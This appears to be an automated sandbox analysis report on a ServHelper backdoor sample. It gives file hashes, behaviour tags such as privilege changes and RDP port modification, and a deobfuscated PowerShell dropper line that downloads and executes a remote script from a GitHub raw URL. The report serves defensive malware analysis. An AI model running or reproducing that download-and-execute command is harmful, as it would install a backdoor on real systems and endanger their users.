General

  • Target

    bfe0ac25eeeb759f7c8e06229c7313a2

  • Size

    5.9MB

  • Sample

    240311-fc7w8acc38

  • MD5

    bfe0ac25eeeb759f7c8e06229c7313a2

  • SHA1

    199c1fbd29f9ec98b83464763dac63ef80998bb3

  • SHA256

    be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c

  • SHA512

    a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72

  • SSDEEP

    49152:tvGIuxrb/TkvO90dL3BmAFd4A64nsfJ1XU59mMJETIR1iVhYOxbJBKqKhmYYMNn9:tvGfXdmAQQQQQQQQQQQQQ

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

    invoke-expression (new-object net.webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")

  • URLs

    ps1.dropper

    https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Targets

    • ServHelper

      ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    • Grants admin privileges

      Uses net.exe to modify the user's privileges.

    • Blocklisted process makes network request

    • Modifies RDP port number used by Windows

    • Possible privilege escalation attempt

    • Sets DLL path for service in the registry

    • Loads dropped DLL

    • Modifies file permissions

    • UPX packed file

      Detects executables packed with UPX or a modified build of the UPX open-source packer.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15
